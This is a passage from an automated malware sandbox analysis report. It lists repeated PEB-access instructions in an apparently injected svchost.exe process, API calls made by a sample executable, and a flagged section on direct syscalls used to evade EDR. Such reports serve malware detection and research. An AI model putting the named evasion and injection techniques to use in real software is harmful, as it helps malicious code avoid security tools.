                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268402 mov eax, dword ptr fs:[00000030h]4_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268402 mov eax, dword ptr fs:[00000030h]4_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BC460 mov ecx, dword ptr fs:[00000030h]4_2_032BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325A470 mov eax, dword ptr fs:[00000030h]4_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325A470 mov eax, dword ptr fs:[00000030h]4_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325A470 mov eax, dword ptr fs:[00000030h]4_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E443 mov eax, dword ptr fs:[00000030h]4_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EA456 mov eax, dword ptr fs:[00000030h]4_2_032EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322645D mov eax, dword ptr fs:[00000030h]4_2_0322645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325245A mov eax, dword ptr fs:[00000030h]4_2_0325245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032364AB mov eax, dword ptr fs:[00000030h]4_2_032364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032644B0 mov ecx, dword ptr fs:[00000030h]4_2_032644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BA4B0 mov eax, dword ptr fs:[00000030h]4_2_032BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EA49A mov eax, dword ptr fs:[00000030h]4_2_032EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032304E5 mov ecx, dword ptr fs:[00000030h]4_2_032304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325EB20 mov eax, dword ptr fs:[00000030h]4_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325EB20 mov eax, dword ptr fs:[00000030h]4_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F8B28 mov eax, dword ptr fs:[00000030h]4_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F8B28 mov eax, dword ptr fs:[00000030h]4_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304B00 mov eax, dword ptr fs:[00000030h]4_2_03304B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AEB1D mov eax, dword ptr fs:[00000030h]4_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322CB7E mov eax, dword ptr fs:[00000030h]4_2_0322CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E4B4B mov eax, dword ptr fs:[00000030h]4_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E4B4B mov eax, dword ptr fs:[00000030h]4_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03302B57 mov eax, dword ptr fs:[00000030h]4_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03302B57 mov eax, dword ptr fs:[00000030h]4_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03302B57 mov eax, dword ptr fs:[00000030h]4_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03302B57 mov eax, dword ptr fs:[00000030h]4_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C6B40 mov eax, dword ptr fs:[00000030h]4_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C6B40 mov eax, dword ptr fs:[00000030h]4_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D8B42 mov eax, dword ptr fs:[00000030h]4_2_032D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FAB40 mov eax, dword ptr fs:[00000030h]4_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03228B50 mov eax, dword ptr fs:[00000030h]4_2_03228B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DEB50 mov eax, dword ptr fs:[00000030h]4_2_032DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240BBE mov eax, dword ptr fs:[00000030h]4_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240BBE mov eax, dword ptr fs:[00000030h]4_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E4BB0 mov eax, dword ptr fs:[00000030h]4_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E4BB0 mov eax, dword ptr fs:[00000030h]4_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238BF0 mov eax, dword ptr fs:[00000030h]4_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238BF0 mov eax, dword ptr fs:[00000030h]4_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238BF0 mov eax, dword ptr fs:[00000030h]4_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325EBFC mov eax, dword ptr fs:[00000030h]4_2_0325EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BCBF0 mov eax, dword ptr fs:[00000030h]4_2_032BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03250BCB mov eax, dword ptr fs:[00000030h]4_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03250BCB mov eax, dword ptr fs:[00000030h]4_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03250BCB mov eax, dword ptr fs:[00000030h]4_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230BCD mov eax, dword ptr fs:[00000030h]4_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230BCD mov eax, dword ptr fs:[00000030h]4_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230BCD mov eax, dword ptr fs:[00000030h]4_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DEBD0 mov eax, dword ptr fs:[00000030h]4_2_032DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326CA24 mov eax, dword ptr fs:[00000030h]4_2_0326CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325EA2E mov eax, dword ptr fs:[00000030h]4_2_0325EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03254A35 mov eax, dword ptr fs:[00000030h]4_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03254A35 mov eax, dword ptr fs:[00000030h]4_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326CA38 mov eax, dword ptr fs:[00000030h]4_2_0326CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BCA11 mov eax, dword ptr fs:[00000030h]4_2_032BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326CA6F mov eax, dword ptr fs:[00000030h]4_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326CA6F mov eax, dword ptr fs:[00000030h]4_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326CA6F mov eax, dword ptr fs:[00000030h]4_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DEA60 mov eax, dword ptr fs:[00000030h]4_2_032DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032ACA72 mov eax, dword ptr fs:[00000030h]4_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032ACA72 mov eax, dword ptr fs:[00000030h]4_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236A50 mov eax, dword ptr fs:[00000030h]4_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236A50 mov eax, dword ptr fs:[00000030h]4_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236A50 mov eax, dword ptr fs:[00000030h]4_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236A50 mov eax, dword ptr fs:[00000030h]4_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236A50 mov eax, dword ptr fs:[00000030h]4_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236A50 mov eax, dword ptr fs:[00000030h]4_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236A50 mov eax, dword ptr fs:[00000030h]4_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240A5B mov eax, dword ptr fs:[00000030h]4_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240A5B mov eax, dword ptr fs:[00000030h]4_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238AA0 mov eax, dword ptr fs:[00000030h]4_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238AA0 mov eax, dword ptr fs:[00000030h]4_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03286AA4 mov eax, dword ptr fs:[00000030h]4_2_03286AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA80 mov eax, dword ptr fs:[00000030h]4_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304A80 mov eax, dword ptr fs:[00000030h]4_2_03304A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268A90 mov edx, dword ptr fs:[00000030h]4_2_03268A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326AAEE mov eax, dword ptr fs:[00000030h]4_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326AAEE mov eax, dword ptr fs:[00000030h]4_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03286ACC mov eax, dword ptr fs:[00000030h]4_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03286ACC mov eax, dword ptr fs:[00000030h]4_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03286ACC mov eax, dword ptr fs:[00000030h]4_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230AD0 mov eax, dword ptr fs:[00000030h]4_2_03230AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03264AD0 mov eax, dword ptr fs:[00000030h]4_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03264AD0 mov eax, dword ptr fs:[00000030h]4_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B892A mov eax, dword ptr fs:[00000030h]4_2_032B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C892B mov eax, dword ptr fs:[00000030h]4_2_032C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE908 mov eax, dword ptr fs:[00000030h]4_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE908 mov eax, dword ptr fs:[00000030h]4_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BC912 mov eax, dword ptr fs:[00000030h]4_2_032BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03228918 mov eax, dword ptr fs:[00000030h]4_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03228918 mov eax, dword ptr fs:[00000030h]4_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03256962 mov eax, dword ptr fs:[00000030h]4_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03256962 mov eax, dword ptr fs:[00000030h]4_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03256962 mov eax, dword ptr fs:[00000030h]4_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0327096E mov eax, dword ptr fs:[00000030h]4_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0327096E mov edx, dword ptr fs:[00000030h]4_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0327096E mov eax, dword ptr fs:[00000030h]4_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D4978 mov eax, dword ptr fs:[00000030h]4_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D4978 mov eax, dword ptr fs:[00000030h]4_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BC97C mov eax, dword ptr fs:[00000030h]4_2_032BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B0946 mov eax, dword ptr fs:[00000030h]4_2_032B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304940 mov eax, dword ptr fs:[00000030h]4_2_03304940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A0 mov eax, dword ptr fs:[00000030h]4_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032309AD mov eax, dword ptr fs:[00000030h]4_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032309AD mov eax, dword ptr fs:[00000030h]4_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B89B3 mov esi, dword ptr fs:[00000030h]4_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B89B3 mov eax, dword ptr fs:[00000030h]4_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B89B3 mov eax, dword ptr fs:[00000030h]4_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BE9E0 mov eax, dword ptr fs:[00000030h]4_2_032BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032629F9 mov eax, dword ptr fs:[00000030h]4_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032629F9 mov eax, dword ptr fs:[00000030h]4_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C69C0 mov eax, dword ptr fs:[00000030h]4_2_032C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A9D0 mov eax, dword ptr fs:[00000030h]4_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A9D0 mov eax, dword ptr fs:[00000030h]4_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A9D0 mov eax, dword ptr fs:[00000030h]4_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A9D0 mov eax, dword ptr fs:[00000030h]4_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A9D0 mov eax, dword ptr fs:[00000030h]4_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A9D0 mov eax, dword ptr fs:[00000030h]4_2_0323A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032649D0 mov eax, dword ptr fs:[00000030h]4_2_032649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FA9D3 mov eax, dword ptr fs:[00000030h]4_2_032FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03252835 mov eax, dword ptr fs:[00000030h]4_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03252835 mov eax, dword ptr fs:[00000030h]4_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03252835 mov eax, dword ptr fs:[00000030h]4_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03252835 mov ecx, dword ptr fs:[00000030h]4_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03252835 mov eax, dword ptr fs:[00000030h]4_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03252835 mov eax, dword ptr fs:[00000030h]4_2_03252835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A830 mov eax, dword ptr fs:[00000030h]4_2_0326A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D483A mov eax, dword ptr fs:[00000030h]4_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D483A mov eax, dword ptr fs:[00000030h]4_2_032D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BC810 mov eax, dword ptr fs:[00000030h]4_2_032BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BE872 mov eax, dword ptr fs:[00000030h]4_2_032BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BE872 mov eax, dword ptr fs:[00000030h]4_2_032BE872
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AEA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00AEA66C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00AD81AC
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD8189 SetUnhandledExceptionFilter,2_2_00AD8189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
